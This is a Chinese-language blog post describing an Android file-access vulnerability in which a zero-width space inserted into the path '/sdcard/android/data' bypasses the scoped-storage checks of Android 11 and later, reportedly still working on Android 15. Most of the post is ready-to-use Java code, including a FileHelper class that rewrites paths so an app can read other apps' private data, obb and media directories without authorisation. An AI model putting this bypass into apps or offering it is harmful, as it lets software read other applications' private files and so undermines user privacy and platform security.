Android无需授权直接访问Android/data目录漏洞

从android11开始,访问/sdcard/Android/data目录需要URI授权,而从更高的版本开始甚至URI权限也被收回,返回"无法使用此文件夹"的提示,这里提供一种方法,可以越权强制访问data目录,当然也包括obb、media等目录,方法就是利用andoird文件提权漏洞。

漏洞原理:利用\u200b这个unicode字符构造一个文件别名,但实际指向的仍然是目标文件,由于这个字符是零宽度,所以系统会将其不可见字符过滤掉,判断为合规文件,从而绕过系统媒体权限

验证机制,实现了像常规访问文件一样访问data目录,目前这个bug在android15下实测仍然有效。

java 复制代码
//获取Android/data下的所有文件
File dataDir = new File("/sdcard/android/\u200bdata");
File[] files = dataDir.listFiles();
java 复制代码
if (ContextCompat.checkSelfPermission(this, Manifest.permission.READ_EXTERNAL_STORAGE) != PackageManager.PERMISSION_GRANTED) {
	//如果没有存储权限,先去申请
	return;
}

File dataDir = new File("/sdcard/android/\u200bdata");

if (dataDir.canRead()) {
	//存在漏洞,直接访问其中的文件
}
java 复制代码
import android.os.Build;
import android.os.Environment;
import java.io.File;
import java.io.IOException;

public class FileHelper {

    /**
     * 是否存在该漏洞,判断前要先获取存储权限
     *
     * @return
     */
    public static boolean canAccessDataDir() {
        if (Build.VERSION.SDK_INT < 30) {
            //android10及以下
            return new File("/sdcard/android/data").canRead();
        } else {
            File dataDir = new File("/sdcard/android/\u200bdata");
            return dataDir.canRead();
        }
    }

    /**
     * 是否是/sdcard/android目录
     *
     * @param dir
     * @return
     */
    public static boolean isAndroidDir(File dir) {
        File rootDir = Environment.getExternalStorageDirectory();
        if (rootDir == null) return false;
        try {
            File canFile = dir.getCanonicalFile();
            if (canFile.getPath().toLowerCase().equals(rootDir.getPath().toLowerCase() + "/android")) {
                return true;
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return false;
    }

    private static String getAndroidPath() {
        File rootDir = Environment.getExternalStorageDirectory();
        if (rootDir == null) {
            return null;
        }
        return rootDir.getPath() + "/Android/";
    }

    /**
     * 获取android目录子文件
     *
     * @param file
     * @return
     */
    public static File getReviseFromAndroid(File file) {
        return new File(file.getParentFile(), "\u200b" + file.getName());
    }

    /**
     * 获取修正过的文件
     *
     * @param file
     * @return
     */
    public static File getReviseFile(File file) {
        if (Build.VERSION.SDK_INT < 30) return file;
        if (file == null) {
            return null;
        }
        String androidPath = getAndroidPath();
        if (androidPath != null) {
            String canPath = getCanonicalPath(file);
            //Log.i("WALX_SPY", canPath + ", " + androidPath);
            if (canPath.length() > androidPath.length() && canPath.toLowerCase().startsWith(androidPath.toLowerCase())) {
                return new File(androidPath + "\u200b" + canPath.substring(androidPath.length()));
            }
        }
        return file;
    }

    private static String getCanonicalPath(File file) {
        //file.getCanonicalPath(); //不能直接使用
        if (file == null) return null;
        String path = null;
        try {
            path = file.getCanonicalPath();
        } catch (IOException e) {
            e.printStackTrace();
        }
        final String sdcard = "/sdcard/";
        if (path == null) path = file.getAbsolutePath();
        if (path.length() > sdcard.length() && path.toLowerCase().startsWith(sdcard)) {
            String androidPath = getAndroidPath();
            if (androidPath != null) {
                path = androidPath + path.substring(sdcard.length());
            }
        }
        return path;
    }

    /**
     * 获取修正过的文件
     *
     * @param path
     * @return
     */
    public static File getReviseFile(String path) {
        return path == null ? null : getReviseFile(new File(path));
    }

    /**
     * 获取修正过的路径
     *
     * @param path
     * @return
     */
    public static String getRevisePath(String path) {
        File file = getReviseFile(path);
        return file == null ? null : file.getAbsolutePath();
    }
}
相关推荐
MoloXuanhe5 分钟前
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
运维·网络·安全·tryhackme·thm
wanhengidc18 分钟前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机
g_i_a_o_giao1 小时前
Android8 binder源码学习分析笔记(一)
android·java·笔记·学习·binder·安卓源码分析
翻滚丷大头鱼1 小时前
android 四大组件—BroadcastReceiver
android
人生游戏牛马NPC1号2 小时前
学习 Android (二十) 学习 OpenCV (五)
android·opencv·学习
2501_916008892 小时前
uni-app iOS 日志与崩溃分析全流程 多工具协作的实战指南
android·ios·小程序·https·uni-app·iphone·webview
文 丰2 小时前
【AndroidStudio】官网下载免安装版,AndroidStudio压缩版的配置和使用
android
WillWolf_Wang2 小时前
Linux 编译 Android 版 QGroundControl 软件并运行到手机上
android·linux·智能手机
fatiaozhang95272 小时前
数码视讯TR100-OTT-G1_国科GK6323_安卓9_广东联通原机修改-TTL烧录包-可救砖
android·xml·电视盒子·刷机固件·机顶盒刷机
撬动未来的支点2 小时前
【Android】内核及子系统
android